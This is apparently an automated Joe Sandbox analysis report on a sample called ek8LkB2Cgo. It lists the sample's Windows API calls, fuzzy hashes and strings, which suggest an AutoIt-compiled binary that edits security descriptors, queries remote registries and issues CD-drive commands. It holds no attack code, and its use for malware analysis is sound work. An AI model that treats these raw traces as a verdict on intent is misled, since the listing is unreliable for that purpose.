• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
• Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
Similarity
• API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
• String ID: .dll$.exe$.icl
• API String ID: 1212759294-1154884017
• Opcode ID: 35230958a738a828cc606b00f83257d842a1f09959b3c6fae8fb7cd1254d25c9
• Instruction ID: ceb88c1429233feddb234b5caf1385b840200ee1c5e5799849ba1c3da3e35014
• Opcode Fuzzy Hash: 35230958a738a828cc606b00f83257d842a1f09959b3c6fae8fb7cd1254d25c9
• Instruction Fuzzy Hash: 9261D271500219BAEB18DF64DC46FFE7BB8BF18765F104106F915E60D0EBB4AA84DBA0
APIs
  • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
  • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
• CharLowerBuffW.USER32(?,?), ref: 0053D292
• GetDriveTypeW.KERNEL32 ref: 0053D2DF
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0053D327
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0053D35E
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0053D38C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
• Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 1148790751-4113822522
• Opcode ID: 8c13e5e7ce9510562be13b3be835f07cc764f81d323e008153977a2ab7f90143
• Instruction ID: c629f30c3522d5823eaf07e716d25d2379238d738951b9b98cfba59d85e2a338
• Opcode Fuzzy Hash: 8c13e5e7ce9510562be13b3be835f07cc764f81d323e008153977a2ab7f90143
• Instruction Fuzzy Hash: 02514A71504209AFC700EF11D98196EBBF4FF99718F10485DF985672A1DB35EE0ACB92
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00563973,00000016,0000138C,00000016,?,00000016,0058DDB4,00000000,?), ref: 005326F1
• LoadStringW.USER32(00000000,?,00563973,00000016), ref: 005326FA
• GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00563973,00000016,0000138C,00000016,?,00000016,0058DDB4,00000000,?,00000016), ref: 0053271C
• LoadStringW.USER32(00000000,?,00563973,00000016), ref: 0053271F
• __swprintf.LIBCMT ref: 0053276F
• __swprintf.LIBCMT ref: 00532780
• _wprintf.LIBCMT ref: 00532829
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00532840
Strings
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
• Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$Message_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 618562835-2268648507
• Opcode ID: 39deaea17d6aace9a488bfca486695035f53fa27a81c1f61464cde8d68d89c06
• Instruction ID: d87bca9b63c8d8c549e8866c3458d2190668aad68b4ebb517b7adef96fe50a67
• Opcode Fuzzy Hash: 39deaea17d6aace9a488bfca486695035f53fa27a81c1f61464cde8d68d89c06
• Instruction Fuzzy Hash: 35414F7280061DBACB14FBD1DE86DFEB778BF55348F10006AB60176092EA346F49DBA4
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0053D0D8
• __swprintf.LIBCMT ref: 0053D0FA
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0053D137
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0053D15C
• _memset.LIBCMT ref: 0053D17B
• _wcsncpy.LIBCMT ref: 0053D1B7
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0053D1EC
• CloseHandle.KERNEL32(00000000), ref: 0053D1F7
• RemoveDirectoryW.KERNEL32(?), ref: 0053D200
• CloseHandle.KERNEL32(00000000), ref: 0053D20A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
• Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• API String ID: 2733774712-3457252023
• Opcode ID: 0f6a0980247caf8961fc1dc7958edc2f6fdbc84d15977a923baebae58ca15a93
• Instruction ID: 4a4a939a22fad8d79f1e2047301ed6038a252053eb37e773a0a9020f5bf9baa0
• Opcode Fuzzy Hash: 0f6a0980247caf8961fc1dc7958edc2f6fdbc84d15977a923baebae58ca15a93
• Instruction Fuzzy Hash: 1131607690010AABDB21DFA0EC49FEB7BBDBF89740F1040B5F509D21A1E77096859B34
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0055BEF4,?,?), ref: 0055E754
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0055BEF4,?,?,00000000,?), ref: 0055E76B
• GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0055BEF4,?,?,00000000,?), ref: 0055E776
• CloseHandle.KERNEL32(00000000,?,?,?,?,0055BEF4,?,?,00000000,?), ref: 0055E783
• GlobalLock.KERNEL32(00000000), ref: 0055E78C
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0055BEF4,?,?,00000000,?), ref: 0055E79B
• GlobalUnlock.KERNEL32(00000000), ref: 0055E7A4
• CloseHandle.KERNEL32(00000000,?,?,?,?,0055BEF4,?,?,00000000,?), ref: 0055E7AB
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0055BEF4,?,?,00000000,?), ref: 0055E7BC
• OleLoadPicture.OLEAUT32(?,00000000,00000000,0057D9BC,?), ref: 0055E7D5
• GlobalFree.KERNEL32(00000000), ref: 0055E7E5
• GetObjectW.GDI32(00000000,00000018,?), ref: 0055E809
• CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0055E834
• DeleteObject.GDI32(00000000), ref: 0055E85C
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0055E872
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
• Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
• Opcode ID: 5b596681f869ce2f64a5fa7a18b8db8986e767ae0fd7a4ad9f960d694ae1065f
• Instruction ID: 4cccc6f6077f66ce776fcc028094cb141ab9669a653e77e470007eebc751f6b3
• Opcode Fuzzy Hash: 5b596681f869ce2f64a5fa7a18b8db8986e767ae0fd7a4ad9f960d694ae1065f
• Instruction Fuzzy Hash: 15416D75600204FFDB119F65DC49EAA7BB9FF99711F104059F909D7260D7309E49EB20
APIs
• __wsplitpath.LIBCMT ref: 0054076F
• _wcscat.LIBCMT ref: 00540787
• _wcscat.LIBCMT ref: 00540799
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005407AE
• SetCurrentDirectoryW.KERNEL32(?), ref: 005407C2
• GetFileAttributesW.KERNEL32(?), ref: 005407DA
• SetFileAttributesW.KERNEL32(?,00000000), ref: 005407F4
• SetCurrentDirectoryW.KERNEL32(?), ref: 00540806
Strings
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
• Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
• String ID: *.*
• API String ID: 34673085-438819550
• Opcode ID: 555e6c3cb2b1775605cf93a9ee345652c2f6b8dc64887c364e53c01cc8f9eaf5
• Instruction ID: 19ac1e88b149d97caa08c28951f8d6b9c98c743a49ca0dd9ca5576c85396ddcd
• Opcode Fuzzy Hash: 555e6c3cb2b1775605cf93a9ee345652c2f6b8dc64887c364e53c01cc8f9eaf5
• Instruction Fuzzy Hash: 0B81A2715043059FDB20DF64C4449AEBBE4BFC8348F255C2EFA8AC7291E634DD858B92
                                                                                  APIs
                                                                                    • Part of subcall function 0050B34E: GetWindowLongW.USER32(?,000000EB), ref: 0050B35F
                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0055EF3B
                                                                                  • GetFocus.USER32 ref: 0055EF4B
                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 0055EF56
                                                                                  • _memset.LIBCMT ref: 0055F081
                                                                                  • GetMenuItemInfoW.USER32 ref: 0055F0AC
                                                                                  • GetMenuItemCount.USER32(00000000), ref: 0055F0CC
                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 0055F0DF
                                                                                  • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0055F113
                                                                                  • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0055F15B
                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0055F193
                                                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0055F1C8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 1296962147-4108050209
                                                                                  • Opcode ID: 243ec304bbde24858ab09577843eabaa74ebe5c6b0d54c2152e98c68a6502dea
                                                                                  • Instruction ID: fb3453a9b4e2efc95b5274173569af1a18b522c5aa7da1615083e357bbcd43bb
                                                                                  • Opcode Fuzzy Hash: 243ec304bbde24858ab09577843eabaa74ebe5c6b0d54c2152e98c68a6502dea
                                                                                  • Instruction Fuzzy Hash: EF818A71104302AFD724CF14D8A9A6ABFE9FF88315F10092EF99997291D730D949DBA2
                                                                                  APIs
                                                                                    • Part of subcall function 0052ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0052ABD7
                                                                                    • Part of subcall function 0052ABBB: GetLastError.KERNEL32(?,0052A69F,?,?,?), ref: 0052ABE1
                                                                                    • Part of subcall function 0052ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0052A69F,?,?,?), ref: 0052ABF0
                                                                                    • Part of subcall function 0052ABBB: HeapAlloc.KERNEL32(00000000,?,0052A69F,?,?,?), ref: 0052ABF7
                                                                                    • Part of subcall function 0052ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0052AC0E
                                                                                    • Part of subcall function 0052AC56: GetProcessHeap.KERNEL32(00000008,0052A6B5,00000000,00000000,?,0052A6B5,?), ref: 0052AC62
                                                                                    • Part of subcall function 0052AC56: HeapAlloc.KERNEL32(00000000,?,0052A6B5,?), ref: 0052AC69
                                                                                    • Part of subcall function 0052AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0052A6B5,?), ref: 0052AC7A
                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0052A8CB
                                                                                  • _memset.LIBCMT ref: 0052A8E0
                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0052A8FF
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 0052A910
                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0052A94D
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0052A969
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 0052A986
                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0052A995
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0052A99C
                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0052A9BD
                                                                                  • CopySid.ADVAPI32(00000000), ref: 0052A9C4
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0052A9F5
                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0052AA1B
                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0052AA2F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3996160137-0
                                                                                  • Opcode ID: 34945f451174d850bf9cc6238dc05f2396691e9132cc679230a1f71e40e7e3b8
                                                                                  • Instruction ID: 6c064632e7e0e8d6d22b4e455e4df573d422c9ab00552cf7ffd31cc3f2a0876b
                                                                                  • Opcode Fuzzy Hash: 34945f451174d850bf9cc6238dc05f2396691e9132cc679230a1f71e40e7e3b8
                                                                                  • Instruction Fuzzy Hash: A8518F7190021AAFDF04DF91EC48EEEBBB9FF05300F048119F915A7290EB319A45DB61
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 00549E36
                                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00549E42
                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00549E4E
                                                                                  • SelectObject.GDI32(00000000,?), ref: 00549E5B
                                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00549EAF
                                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00549EEB
                                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00549F0F
                                                                                  • SelectObject.GDI32(00000006,?), ref: 00549F17
                                                                                  • DeleteObject.GDI32(?), ref: 00549F20
                                                                                  • DeleteDC.GDI32(00000006), ref: 00549F27
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00549F32
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                  • String ID: (
                                                                                  • API String ID: 2598888154-3887548279
                                                                                  • Opcode ID: 7cb3aecf1b9ac4e3a17793a0153fcd66a7809cdc87d673c602fe42429bb37721
                                                                                  • Instruction ID: e03fa7595fd93ab79cf063f521ec892cd0d87da8a5d0cee32d53f1bf3fad861a
                                                                                  • Opcode Fuzzy Hash: 7cb3aecf1b9ac4e3a17793a0153fcd66a7809cdc87d673c602fe42429bb37721
                                                                                  • Instruction Fuzzy Hash: B4514775900309AFCB14CFA8D889EAEBBB9FF48310F14881DF959A7250D731A944DBA0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadString__swprintf_wprintf
                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                  • API String ID: 2889450990-2391861430
                                                                                  • Opcode ID: 3700f6b7e80e60be624f64179118b072bcf0cd02b7d8b07581ea82cd94844638
                                                                                  • Instruction ID: a2fd9fa88b9e5e55a767d3885b013119370723da66d6d09df2f9cda072d5533a
                                                                                  • Opcode Fuzzy Hash: 3700f6b7e80e60be624f64179118b072bcf0cd02b7d8b07581ea82cd94844638
                                                                                  • Instruction Fuzzy Hash: 1F51703180050DAADB15FBE1DE46EEEBB78BF15308F10016AF605720A2EB356F59DB64
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadString__swprintf_wprintf
                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                  • API String ID: 2889450990-3420473620
                                                                                  • Opcode ID: b98c0726b3d3d7c9aa1b99df5dda67077c43b1cc5c20186002c064c50892b69b
                                                                                  • Instruction ID: 1ff24c45a4f786d1f9a8e8615e564380245347f749466c2addbeeb6afd1a548d
                                                                                  • Opcode Fuzzy Hash: b98c0726b3d3d7c9aa1b99df5dda67077c43b1cc5c20186002c064c50892b69b
                                                                                  • Instruction Fuzzy Hash: 2851813180050DAADB15FBE1DE46EEEBB78BF14308F50016AF605720A2EB346F59DB65
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00552BB5,?,?), ref: 00553C1D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpper
                                                                                  • String ID: $EZ$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                  • API String ID: 3964851224-1024664198
                                                                                  • Opcode ID: 19803a8fa31b66d9d1aa18cdacfac407b7cff2985d8255fb0d4f865e673a9636
                                                                                  • Instruction ID: 902d88b8428607c79362c14b67cddb7bf00b40e3cc7a74493a737a80b95f1435
                                                                                  • Opcode Fuzzy Hash: 19803a8fa31b66d9d1aa18cdacfac407b7cff2985d8255fb0d4f865e673a9636
                                                                                  • Instruction Fuzzy Hash: 6E41233051024A8BDF04EF54D8615EE3F75BF96381F60485DEC591B192EB75AE0ECB50
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 005355D7
                                                                                  • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00535664
                                                                                  • GetMenuItemCount.USER32(005B1708), ref: 005356ED
                                                                                  • DeleteMenu.USER32(005B1708,00000005,00000000,000000F5,?,?), ref: 0053577D
                                                                                  • DeleteMenu.USER32(005B1708,00000004,00000000), ref: 00535785
                                                                                  • DeleteMenu.USER32(005B1708,00000006,00000000), ref: 0053578D
                                                                                  • DeleteMenu.USER32(005B1708,00000003,00000000), ref: 00535795
                                                                                  • GetMenuItemCount.USER32(005B1708), ref: 0053579D
                                                                                  • SetMenuItemInfoW.USER32(005B1708,00000004,00000000,00000030), ref: 005357D3
                                                                                  • GetCursorPos.USER32(?), ref: 005357DD
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 005357E6
                                                                                  • TrackPopupMenuEx.USER32(005B1708,00000000,?,00000000,00000000,00000000), ref: 005357F9
                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00535805
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3993528054-0
                                                                                  • Opcode ID: 1b952d89dc1ca5300695ae98ba11275d66a6d73d36edc4b4aeb0ed4f6d8693c3
                                                                                  • Instruction ID: 59064f412d6057492814560c52cc4cdd5750ff0dbde3e6a28abfff9069101558
                                                                                  • Opcode Fuzzy Hash: 1b952d89dc1ca5300695ae98ba11275d66a6d73d36edc4b4aeb0ed4f6d8693c3
                                                                                  • Instruction Fuzzy Hash: A1712670640A05BFEB209F55DC4AFAABFB5FF40364F240205F618AA1E0D7706C50DBA4
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0052A1DC
                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0052A211
                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0052A22D
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0052A249
                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0052A273
                                                                                  • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0052A29B
                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0052A2A6
                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0052A2AB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
